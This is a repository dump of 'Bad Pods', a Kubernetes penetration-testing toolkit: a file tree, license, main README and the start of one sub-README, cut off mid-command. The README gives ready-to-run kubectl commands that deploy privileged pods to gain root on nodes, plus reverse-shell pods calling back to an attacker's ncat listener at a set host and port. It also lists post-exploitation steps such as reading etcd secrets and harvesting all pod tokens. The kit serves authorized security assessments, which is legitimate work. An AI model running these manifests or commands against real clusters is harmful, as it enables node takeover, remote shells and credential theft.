├── .github └── images │ ├── Pod1.jpg │ ├── Pod2.jpg │ ├── Pod3.jpg │ ├── Pod4.jpg │ ├── Pod5.jpg │ ├── Pod6.jpg │ ├── Pod7.jpg │ ├── Pod8.jpg │ └── Title.jpg ├── LICENSE ├── README.md ├── manifests ├── everything-allowed │ ├── README.md │ ├── cronjob │ │ ├── everything-allowed-exec-cronjob.yaml │ │ └── everything-allowed-revshell-cronjob.yaml │ ├── deamonset │ │ ├── everything-allowed-exec-deamonset.yaml │ │ └── everything-allowed-revshell-deamonset.yaml │ ├── deployment │ │ ├── everything-allowed-exec-deployment.yaml │ │ └── everything-allowed-revshell-deployment.yaml │ ├── job │ │ ├── everything-allowed-exec-job.yaml │ │ └── everything-allowed-revshell-job.yaml │ ├── pod │ │ ├── everything-allowed-exec-pod.yaml │ │ └── everything-allowed-revshell-pod.yaml │ ├── replicaset │ │ ├── everything-allowed-exec-replicaset.yaml │ │ └── everything-allowed-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── everything-allowed-exec-replicationcontroller.yaml │ │ └── everything-allowed-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── everything-allowed-exec-statefulset.yaml │ │ └── everything-allowed-revshell-statefulset.yaml ├── hostipc │ ├── README.md │ ├── cronjob │ │ ├── hostipc-exec-cronjob.yaml │ │ └── hostipc-revshell-cronjob.yaml │ ├── deamonset │ │ ├── hostipc-exec-deamonset.yaml │ │ └── hostipc-revshell-deamonset.yaml │ ├── deployment │ │ ├── hostipc-exec-deployment.yaml │ │ └── hostipc-revshell-deployment.yaml │ ├── job │ │ ├── hostipc-exec-job.yaml │ │ └── hostipc-revshell-job.yaml │ ├── pod │ │ ├── hostipc-exec-pod.yaml │ │ └── hostipc-revshell-pod.yaml │ ├── replicaset │ │ ├── hostipc-exec-replicaset.yaml │ │ └── hostipc-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── hostipc-exec-replicationcontroller.yaml │ │ └── hostipc-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── hostipc-exec-statefulset.yaml │ │ └── hostipc-revshell-statefulset.yaml ├── hostnetwork │ ├── README.md │ ├── cronjob │ │ ├── hostnetwork-exec-cronjob.yaml │ │ └── hostnetwork-revshell-cronjob.yaml │ ├── deamonset │ │ ├── hostnetwork-exec-deamonset.yaml │ │ └── hostnetwork-revshell-deamonset.yaml │ ├── deployment │ │ ├── hostnetwork-exec-deployment.yaml │ │ └── hostnetwork-revshell-deployment.yaml │ ├── job │ │ ├── hostnetwork-exec-job.yaml │ │ └── hostnetwork-revshell-job.yaml │ ├── pod │ │ ├── hostnetwork-exec-pod.yaml │ │ └── hostnetwork-revshell-pod.yaml │ ├── replicaset │ │ ├── hostnetwork-exec-replicaset.yaml │ │ └── hostnetwork-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── hostnetwork-exec-replicationcontroller.yaml │ │ └── hostnetwork-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── hostnetwork-exec-statefulset.yaml │ │ └── hostnetwork-revshell-statefulset.yaml ├── hostpath │ ├── README.md │ ├── cronjob │ │ ├── hostpath-exec-cronjob.yaml │ │ └── hostpath-revshell-cronjob.yaml │ ├── deamonset │ │ ├── hostpath-exec-deamonset.yaml │ │ └── hostpath-revshell-deamonset.yaml │ ├── deployment │ │ ├── hostpath-exec-deployment.yaml │ │ └── hostpath-revshell-deployment.yaml │ ├── job │ │ ├── hostpath-exec-job.yaml │ │ └── hostpath-revshell-job.yaml │ ├── pod │ │ ├── hostpath-exec-pod.yaml │ │ └── hostpath-revshell-pod.yaml │ ├── replicaset │ │ ├── hostpath-exec-replicaset.yaml │ │ └── hostpath-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── hostpath-exec-replicationcontroller.yaml │ │ └── hostpath-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── hostpath-exec-statefulset.yaml │ │ └── hostpath-revshell-statefulset.yaml ├── hostpid │ ├── README.md │ ├── cronjob │ │ ├── hostpid-exec-cronjob.yaml │ │ └── hostpid-revshell-cronjob.yaml │ ├── deamonset │ │ ├── hostpid-exec-deamonset.yaml │ │ └── hostpid-revshell-deamonset.yaml │ ├── deployment │ │ ├── hostpid-exec-deployment.yaml │ │ └── hostpid-revshell-deployment.yaml │ ├── job │ │ ├── hostpid-exec-job.yaml │ │ └── hostpid-revshell-job.yaml │ ├── pod │ │ ├── hostpid-exec-pod.yaml │ │ └── hostpid-revshell-pod.yaml │ ├── replicaset │ │ ├── hostpid-exec-replicaset.yaml │ │ └── hostpid-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── hostpid-exec-replicationcontroller.yaml │ │ └── hostpid-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── hostpid-exec-statefulset.yaml │ │ └── hostpid-revshell-statefulset.yaml ├── nothing-allowed │ ├── README.md │ ├── cronjob │ │ ├── nothing-allowed-exec-cronjob.yaml │ │ └── nothing-allowed-revshell-cronjob.yaml │ ├── deamonset │ │ ├── nothing-allowed-exec-deamonset.yaml │ │ └── nothing-allowed-revshell-deamonset.yaml │ ├── deployment │ │ ├── nothing-allowed-exec-deployment.yaml │ │ └── nothing-allowed-revshell-deployment.yaml │ ├── job │ │ ├── nothing-allowed-exec-job.yaml │ │ └── nothing-allowed-revshell-job.yaml │ ├── pod │ │ ├── nothing-allowed-exec-pod.yaml │ │ └── nothing-allowed-revshell-pod.yaml │ ├── replicaset │ │ ├── nothing-allowed-exec-replicaset.yaml │ │ └── nothing-allowed-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── nothing-allowed-exec-replicationcontroller.yaml │ │ └── nothing-allowed-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── nothing-allowed-exec-statefulset.yaml │ │ └── nothing-allowed-revshell-statefulset.yaml ├── priv-and-hostpid │ ├── README.md │ ├── cronjob │ │ ├── priv-and-hostpid-exec-cronjob.yaml │ │ └── priv-and-hostpid-revshell-cronjob.yaml │ ├── deamonset │ │ ├── priv-and-hostpid-exec-deamonset.yaml │ │ └── priv-and-hostpid-revshell-deamonset.yaml │ ├── deployment │ │ ├── priv-and-hostpid-exec-deployment.yaml │ │ └── priv-and-hostpid-revshell-deployment.yaml │ ├── job │ │ ├── priv-and-hostpid-exec-job.yaml │ │ └── priv-and-hostpid-revshell-job.yaml │ ├── pod │ │ ├── priv-and-hostpid-exec-pod.yaml │ │ └── priv-and-hostpid-revshell-pod.yaml │ ├── replicaset │ │ ├── priv-and-hostpid-exec-replicaset.yaml │ │ └── priv-and-hostpid-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── priv-and-hostpid-exec-replicationcontroller.yaml │ │ └── priv-and-hostpid-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── priv-and-hostpid-exec-statefulset.yaml │ │ └── priv-and-hostpid-revshell-statefulset.yaml └── priv │ ├── README.md │ ├── cronjob │ ├── priv-exec-cronjob.yaml │ └── priv-revshell-cronjob.yaml │ ├── deamonset │ ├── priv-exec-deamonset.yaml │ └── priv-revshell-deamonset.yaml │ ├── deployment │ ├── priv-exec-deployment.yaml │ └── priv-revshell-deployment.yaml │ ├── job │ ├── priv-exec-job.yaml │ └── priv-revshell-job.yaml │ ├── pod │ ├── priv-exec-pod.yaml │ └── priv-revshell-pod.yaml │ ├── replicaset │ ├── priv-exec-replicaset.yaml │ └── priv-revshell-replicaset.yaml │ ├── replicationcontroller │ ├── priv-exec-replicationcontroller.yaml │ └── priv-revshell-replicationcontroller.yaml │ └── statefulset │ ├── priv-exec-statefulset.yaml │ └── priv-revshell-statefulset.yaml └── scripts └── can-they.sh /.github/images/Pod1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod1.jpg -------------------------------------------------------------------------------- /.github/images/Pod2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod2.jpg -------------------------------------------------------------------------------- /.github/images/Pod3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod3.jpg -------------------------------------------------------------------------------- /.github/images/Pod4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod4.jpg -------------------------------------------------------------------------------- /.github/images/Pod5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod5.jpg -------------------------------------------------------------------------------- /.github/images/Pod6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod6.jpg -------------------------------------------------------------------------------- /.github/images/Pod7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod7.jpg -------------------------------------------------------------------------------- /.github/images/Pod8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod8.jpg -------------------------------------------------------------------------------- /.github/images/Title.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Title.jpg -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 sart-bf 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bad Pods 2 | 3 | ![](.github/images/Title.jpg) 4 | 5 | A collection of manifests that create pods with different elevated privileges. Quickly demonstrate the impact of allowing security sensitive pod attributes like `hostNetwork`, `hostPID`, `hostPath`, `hostIPC`, and `privileged`. 6 | 7 | For additional background, see our blog post: [Bad Pods: Kubernetes Pod Privilege Escalation](https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation). 8 | 9 | ## Contents 10 | 11 | * [The Bad pods line-up](#The-bad-pods-line-up) 12 | * [Prerequisites](#Prerequisites) 13 | * [Organization](#Organization) 14 | * [Usage](#Usage) 15 | * [High level approach](#High-level-approach) 16 | * [Usage examples](#Usage-examples) 17 | * [Create all eight Bad Pods from cloned local repo](#Create-all-eight-Bad-Pods-from-cloned-local-repo) 18 | * [Create all eight Bad Pods from github](#Create-all-eight-Bad-Pods-from-Github) 19 | * [Create all eight reverse shell Bad Pods](#Create-all-eight-revsere-shell-Bad-Pods) 20 | * [Create all eight resource types using the everything-allowed pod](#Create-all-eight-resource-types-using-the-everything-allowed-pod) 21 | * [Create a cronjob with the hostNetwork pod](#Create-a-cronjob-with-the-hostNetwork-pod) 22 | * [Create a deployment with the priv-and-hostpid pod](#Create-a-deployment-with-the-priv-and-hostpid-pod) 23 | * [Create a reverse shell using the privileged pod](#Create-a-reverse-shell-using-the-privileged-pod) 24 | * [Acknowledgements](#Acknowledgements) 25 | * [References and further reading](#References-and-further-reading) 26 | 27 | ## The Bad Pods line-up 28 | Each link below provides detailed usage information and post exploitation recommendations. 29 | 30 | * [Bad Pod #1: Everything allowed](manifests/everything-allowed/) 31 | * [Bad Pod #2: Privileged and hostPid](manifests/priv-and-hostpid/) 32 | * [Bad Pod #3: Privileged only](manifests/priv/) 33 | * [Bad Pod #4: hostPath only](manifests/hostpath/) 34 | * [Bad Pod #5: hostPid only](manifests/hostpid/) 35 | * [Bad Pod #6: hostNetwork only](manifests/hostnetwork/) 36 | * [Bad Pod #7: hostIPC only](manifests/hostipc/) 37 | * [Bad Pod #8: Nothing allowed](manifests/nothing-allowed/) 38 | 39 | For more general information about prerequisites, repository organization, and common usage patterns, see the sections below. 40 | # Prerequisites 41 | 1. Access to a cluster 42 | 1. RBAC permission to create one of the following resource types in at least one namespace: 43 | * CronJob, DeamonSet, Deployment, Job, Pod, ReplicaSet, ReplicationController, StatefulSet 44 | 1. RBAC permission to exec into pods or a network policy that allows a reverse shell from a pod to reach you. 45 | 1. No pod security policy enforcement, or a policy that allows pods to be created with one or more security sensitive attributes 46 | 47 | 48 | 49 | # Organization 50 | * 128 self-contained, ready to use manifests. Why so many? 51 | * 8 Bad Pods (hostpid, hostnetwork, everything-allowed, etc.) 52 | * 8 resource types that can create pods (pod, deployment, replicaset, statefulset, etc.) 53 | * 2 ways to access the created pods (exec & reverse shell) 54 | 55 | ``` 56 | ├── manifests 57 | │   ├── everything-allowed 58 | │   │   ├── cronjob 59 | │   │   │   ├── everything-allowed-exec-cronjob.yaml 60 | │   │   │   └── everything-allowed-revshell-cronjob.yaml 61 | │   │   ├── daemonset 62 | │   │   │   ├── everything-allowed-exec-daemonset.yaml 63 | │   │   │   └── everything-allowed-revshell-daemonset.yaml 64 | │   │   ├── deployment 65 | │   │   │   ├── everything-allowed-exec-deployment.yaml 66 | │   │   │   └── everything-allowed-revshell-deployment.yaml 67 | │   │   ├── job 68 | │   │   │   ├── everything-allowed-exec-job.yaml 69 | │   │   │   └── everything-allowed-revshell-job.yaml 70 | │   │   ├── pod 71 | │   │   │   ├── everything-allowed-exec-pod.yaml 72 | │   │   │   └── everything-allowed-revshell-pod.yaml 73 | │   │   ├── replicaset 74 | │   │   │   ├── everything-allowed-exec-replicaset.yaml 75 | │   │   │   └── everything-allowed-revshell-replicaset.yaml 76 | │   │   ├── replicationcontroller 77 | │   │   │   ├── everything-allowed-exec-replicationcontroller.yaml 78 | │   │   │   └── everything-allowed-revshell-replicationcontroller.yaml 79 | │   │   └── statefulset 80 | │   │   ├── everything-allowed-exec-statefulset.yaml 81 | │   │   └── everything-allowed-revshell-statefulset.yaml 82 | │   ├── hostipc 83 | │   │   ├── cronjob 84 | │   │   │   ├── hostipc-exec-cronjob.yaml 85 | │   │   │   └── hostipc-revshell-cronjob.yaml 86 | │   │   ├── daemonset 87 | │   │   │   ├── hostipc-exec-daemonset.yaml 88 | │   │   │   └── hostipc-revshell-daemonset.yaml 89 | ...omitted for brevity... 90 | ``` 91 | 92 | ### There are eight ways to create a pod 93 | As [Eviatar Gerzi (@g3rzi)](https://twitter.com/g3rzi) points out in the post [Eight Ways to Create a Pod](https://www.cyberark.com/resources/threat-research-blog/eight-ways-to-create-a-pod), there are 8 different controllers that can create a pod, or a set of pods. You might not be authorized to create pods, but maybe you can create another resource type that will create one or more pods. For each badPod type, there are manifests that correspond to all eight resource types. 94 | 95 | But wait, it gets worse! In addition to the eight current Kubernetes controllers that can create pods, there are third party controllers that can also create pods if they are applied to the cluster. Keep an eye out for them by looking at `kubectl api-resources`. 96 | 97 | ### Reverse shells 98 | While common, it is not always the case that you can exec into pods that you can create. To help in those situations, a version of each manifest is included that uses [Rory McCune's (@raesene)](https://twitter.com/raesene) ncat dockerhub image. When created, the pod will make an encrypted call back to your listener. 99 | 100 | # Usage 101 | Each resource in the `manifests` directory targets a specific attribute or a combination of attributes that expose the cluster to risk when allowed. 102 | 103 | ## High level approach 104 | 105 | #### Option 1: Methodical approach 106 | 1. **Evaluate RBAC** - Determine which resource types you can create 107 | 1. **Evaluate Admission Policy** - Determine which of the Bad Pods you will be able to create 108 | 1. **Create Resources** - Based on what is allowed, use the specific badPod type and resource type and create your resources 109 | 1. **Post Exploitation** - Evaluate post exploitation steps outlined in the README for that type 110 | * [Everything allowed](manifests/everything-allowed/) 111 | * [Privileged and hostPid](manifests/priv-and-hostpid/) 112 | * [Privileged only](manifests/priv/) 113 | * [hostPath only](manifests/hostpath/) 114 | * [hostPid only](manifests/hostpid/) 115 | * [hostNetwork only](manifests/hostnetwork/) 116 | * [hostIPC only](manifests/hostipc/) 117 | * [Nothing allowed](manifests/nothing-allowed/) 118 | 119 | 120 | #### Option 2: Shotgun approach 121 | 1. **Create Resources** - Just start applying different manifests and see what works 122 | * [Create all eight Bad Pods from Github](#Create-all-eight-Bad-Pods-from-Github) 123 | * [Create all eight resource types using the everything-allowed pod](#create-all-eight-resource-types-using-the-everything-allowed-pod) 124 | 1. **Post Exploitation** - For any created pods, evaluate post exploitation steps outlined in the README for that type 125 | * [Everything allowed](manifests/everything-allowed/) 126 | * [Privileged and hostPid](manifests/priv-and-hostpid/) 127 | * [Privileged only](manifests/priv/) 128 | * [hostPath only](manifests/hostpath/) 129 | * [hostPid only](manifests/hostpid/) 130 | * [hostNetwork only](manifests/hostnetwork/) 131 | * [hostIPC only](manifests/hostipc/) 132 | * [Nothing allowed](manifests/nothing-allowed/) 133 | 134 | ## Usage Examples 135 | 136 | * [Create all eight Bad Pods from cloned local repo](#Create-all-eight-Bad-Pods-from-cloned-local-repo) 137 | * [Create all eight Bad Pods from github](#Create-all-eight-Bad-Pods-from-Github) 138 | * [Create all eight reverse shell Bad Pods](#Create-all-eight-revsere-shell-Bad-Pods) 139 | * [Create all eight resource types using the everything-allowed pod](#Create-all-eight-resource-types-using-the-everything-allowed-pod) 140 | * [Create a cronjob with the hostNetwork pod](#Create-a-cronjob-with-the-hostNetwork-pod) 141 | * [Create a deployment with the priv-and-hostpid pod](#Create-a-deployment-with-the-priv-and-hostpid-pod) 142 | * [Create a reverse shell using the privileged pod](#Create-a-reverse-shell-using-the-privileged-pod) 143 | 144 | 145 | ### Create all eight Bad Pods from cloned local repo 146 | ``` 147 | kubectl apply -f ./manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 148 | kubectl apply -f ./manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 149 | kubectl apply -f ./manifests/priv/pod/priv-exec-pod.yaml 150 | kubectl apply -f ./manifests/hostpath/pod/hostpath-exec-pod.yaml 151 | kubectl apply -f ./manifests/hostpid/pod/hostpid-exec-pod.yaml 152 | kubectl apply -f ./manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 153 | kubectl apply -f ./manifests/hostipc/pod/hostipc-exec-pod.yaml 154 | kubectl apply -f ./manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml 155 | ``` 156 | 157 | ### Create all eight Bad Pods from Github 158 | ``` 159 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 160 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 161 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml 162 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml 163 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml 164 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 165 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml 166 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml 167 | ``` 168 | 169 | ### Create all eight revsere shell badPods 170 | To avoid having to edit each pod with your host and port, you can environment variables and the `envsubst` command. Remember to spin up all of your listeners first! 171 | 172 | ``` 173 | HOST="10.0.0.1" PORT="3111" envsubst < ./manifests/everything-allowed/pod/everything-allowed-revshell-pod.yaml | kubectl apply -f - 174 | HOST="10.0.0.1" PORT="3112" envsubst < ./manifests/priv-and-hostpid/pod/priv-and-hostpid-revshell-pod.yaml | kubectl apply -f - 175 | HOST="10.0.0.1" PORT="3113" envsubst < ./manifests/priv/pod/priv-revshell-pod.yaml | kubectl apply -f - 176 | HOST="10.0.0.1" PORT="3114" envsubst < ./manifests/hostpath/pod/hostpath-revshell-pod.yaml | kubectl apply -f - 177 | HOST="10.0.0.1" PORT="3115" envsubst < ./manifests/hostpid/pod/hostpid-revshell-pod.yaml | kubectl apply -f - 178 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostnetwork/pod/hostnetwork-revshell-pod.yaml | kubectl apply -f - 179 | HOST="10.0.0.1" PORT="3117" envsubst < ./manifests/hostipc/pod/hostipc-revshell-pod.yaml | kubectl apply -f - 180 | HOST="10.0.0.1" PORT="3118" envsubst < ./manifests/nothing-allowed/pod/nothing-allowed-revshell-pod.yaml | kubectl apply -f - 181 | ``` 182 | ### Create a cronjob with the hostNetwork pod 183 | ``` 184 | kubectl apply -f manifests/hostnetwork/cronjob/hostnetwork-exec-cronjob.yaml 185 | ``` 186 | 187 | Find the created pod 188 | ``` 189 | kubectl get pods | grep cronjob 190 | 191 | NAME READY STATUS RESTARTS AGE 192 | hostnetwork-exec-cronjob-1607351160-gm2x4 1/1 Running 0 24s 193 | ``` 194 | 195 | Exec into pod 196 | ``` 197 | kubectl exec -it hostnetwork-exec-cronjob-1607351160-gm2x4 -- bash 198 | ``` 199 | 200 | ### Create a deployment with the priv-and-hostpid pod 201 | ``` 202 | kubectl apply -f manifests/priv-and-hostpid/deployment/priv-and-hostpid-exec-deployment.yaml 203 | ``` 204 | Find the created pod 205 | ``` 206 | kubectl get pods | grep deployment 207 | 208 | priv-and-hostpid-exec-deployment-65dbfbf947-qwpz9 1/1 Running 0 56s 209 | priv-and-hostpid-exec-deployment-65dbfbf947-tghqh 1/1 Running 0 56s 210 | ``` 211 | Exec into pod 212 | ``` 213 | kubectl exec -it priv-and-hostpid-exec-deployment-65dbfbf947-qwpz9 -- bash 214 | ``` 215 | 216 | ### Create all eight resource types using the everything-allowed pod 217 | ``` 218 | find manifests/everything-allowed/ -name "*-exec-*.yaml" -exec kubectl apply -f {} \; 219 | 220 | cronjob.batch/everything-allowed-exec-cronjob created 221 | daemonset.apps/everything-allowed-exec-daemonset created 222 | deployment.apps/everything-allowed-exec-deployment created 223 | job.batch/everything-allowed-exec-job created 224 | pod/everything-allowed-exec-pod created 225 | replicaset.apps/everything-allowed-exec-replicaset created 226 | replicationcontroller/everything-allowed-exec-replicationcontroller created 227 | service/everything-allowed-exec-statefulset-service created 228 | statefulset.apps/everything-allowed-exec-statefulset created 229 | ``` 230 | 231 | View all of the created pods 232 | ``` 233 | kubectl get pods 234 | 235 | NAME READY STATUS RESTARTS AGE 236 | everything-allowed-exec-daemonset-qbrdb 1/1 Running 0 52s 237 | everything-allowed-exec-deployment-6cd7685786-rp65h 1/1 Running 0 51s 238 | everything-allowed-exec-deployment-6cd7685786-m66bl 1/1 Running 0 51s 239 | everything-allowed-exec-job-fhsbt 1/1 Running 0 50s 240 | everything-allowed-exec-pod 1/1 Running 0 50s 241 | everything-allowed-exec-replicaset-tlp8v 1/1 Running 0 49s 242 | everything-allowed-exec-replicaset-6znbz 1/1 Running 0 49s 243 | everything-allowed-exec-replicationcontroller-z9k8n 1/1 Running 0 48s 244 | everything-allowed-exec-replicationcontroller-m4648 1/1 Running 0 48s 245 | everything-allowed-exec-statefulset-0 1/1 Running 0 47s 246 | everything-allowed-exec-statefulset-1 1/1 Running 0 42s 247 | ``` 248 | Delete all everything-allowed resources 249 | ``` 250 | find manifests/everything-allowed/ -name "*-exec-*.yaml" -exec kubectl delete -f {} \; 251 | ``` 252 | 253 | ### Create a reverse shell using the privileged pod 254 | Set up listener 255 | ``` 256 | ncat --ssl -vlp 3116 257 | ``` 258 | 259 | Create pod from local yaml without modifying it by using env variables and envsubst 260 | ``` 261 | HOST="10.0.0.1" PORT="3116" envsubst < ./yaml/priv/pod-priv-revshell.yaml | kubectl apply -f - 262 | ``` 263 | Catch the shell 264 | ``` 265 | ncat --ssl -vlp 3116 266 | Ncat: Version 7.80 ( https://nmap.org/ncat ) 267 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 268 | Ncat: Listening on :::3116 269 | Ncat: Listening on 0.0.0.0:3116 270 | 271 | Connection received on 10.0.0.162 42035 272 | ``` 273 | 274 | # Contributing 275 | Pull requests and issues welcome. 276 | 277 | # Acknowledgements 278 | Thank you [Rory McCune](https://twitter.com/raesene), [Duffie Cooley](https://twitter.com/mauilion), [Brad Geesaman](https://twitter.com/bradgeesaman), [Tabitha Sable](https://twitter.com/tabbysable), [Ian Coldwater](https://twitter.com/IanColdwater), [Mark Manning](https://twitter.com/antitree), [Eviatar Gerzi](https://twitter.com/g3rzi), and [Madhu Akula](https://twitter.com/madhuakula) for publicly sharing so much knowledge about Kubernetes offensive security. 279 | 280 | # References and further reading 281 | Each Bad Pod has it's own references and further reading section, but here are some more general resources that will help you ramp up your Kubernetes security assessments and penetration tests skills. 282 | 283 | ## New kids on the block - 2020 284 | * [Container Security Site](https://www.container-security.site/) by @raesene 285 | * [CloudSecDocs - Container Security](https://cloudsecdocs.com/container_security/offensive/attacks/compromised_container/) by @lancinimarco 286 | * [Risk8s Business: Risk Analysis of Kubernetes Clusters](https://tldrsec.com/guides/kubernetes/) by @antitree 287 | * Compromising Kubernetes Cluster by Exploiting RBAC Permissions by @g3rzi - [Talk](https://www.youtube.com/watch?v=1LMo0CftVC4) / [Slides](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf) 288 | * Command and KubeCTL: Real-World Kubernetes Security for Pentesters by @antitree - [Talk](https://www.youtube.com/watch?v=cRbHILH4f0A) / [Blog](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/) 289 | * Kubernetes Goat by @madhuakula - [Repo](https://github.com/madhuakula/kubernetes-goat) / [Guide](https://madhuakula.com/kubernetes-goat/) 290 | 291 | ## The classics, way back from 2019 292 | * [Secure Kubernetes - KubeCon NA 2019 CTF](https://securekubernetes.com/) by @tabbysable, @petermbenjamin, @jimmesta, and @BradGeesaman 293 | * [The Most Pointless Kubernetes Command Ever](https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/) by @raesene 294 | * The Path Less Traveled: Abusing Kubernetes Defaults by @IanColdwater and @mauilion- [Talk](https://www.youtube.com/watch?v=HmoVSmTIOxM) / [Repository](https://github.com/mauilion/blackhat-2019) 295 | * [Understanding Docker container escapes](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) by @disconnect3d_pl 296 | * [A Compendium of Container Escapes](https://www.youtube.com/watch?v=BQlqita2D2s) by @drraid and @0x7674 297 | * [Attacking Kubernetes through Kubelet](https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet/) 298 | 299 | -------------------------------------------------------------------------------- /manifests/everything-allowed/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #1: Everything allowed 2 | ![](../../.github/images/Pod1.jpg) 3 | 4 | The everything-allowed pod mounts the host’s filesystem to the pod, and gives you access to all of the host's namespaces and capabilities. You then exec into your pod and chroot to the directory where you mounted the host’s filesystem. You now have root on the node running your pod. 5 | 6 | ## Table of Contents 7 | - [Pod creation & access](#pod-creation--access) 8 | - [Exec pods](#exec-pods) 9 | - [Reverse shell pods](#reverse-shell-pods) 10 | - [Deleting resources](#deleting-resources) 11 | - [Post exploitation](#post-exploitation) 12 | - [Can you run your pod on a control-plane node](#can-you-run-your-pod-on-a-control-plane-node) 13 | - [Read secrets from etcd](#read-secrets-from-etcd) 14 | - [Look for kubeconfigs in the host filesystem](#look-for-kubeconfigs-in-the-host-filesystem) 15 | - [Grab all tokens from all pods on the system](#grab-all-tokens-from-all-pods-on-the-system) 16 | - [Some other ideas](#some-other-ideas) 17 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 18 | - [Demonstrate impact](#demonstrate-impact) 19 | - [References and further reading:](#references-and-further-reading) 20 | 21 | # Pod creation & access 22 | 23 | ## Exec pods 24 | Create one or more of these resource types and exec into the pod 25 | 26 | **Pod** 27 | ```bash 28 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 29 | kubectl exec -it everything-allowed-exec-pod -- chroot /host bash 30 | ``` 31 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 32 | 33 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 34 | 35 | ```bash 36 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/[RESOURCE_TYPE]/everything-allowed-exec-[RESOURCE_TYPE].yaml 37 | kubectl get pods | grep everything-allowed-exec-[RESOURCE_TYPE] 38 | kubectl exec -it 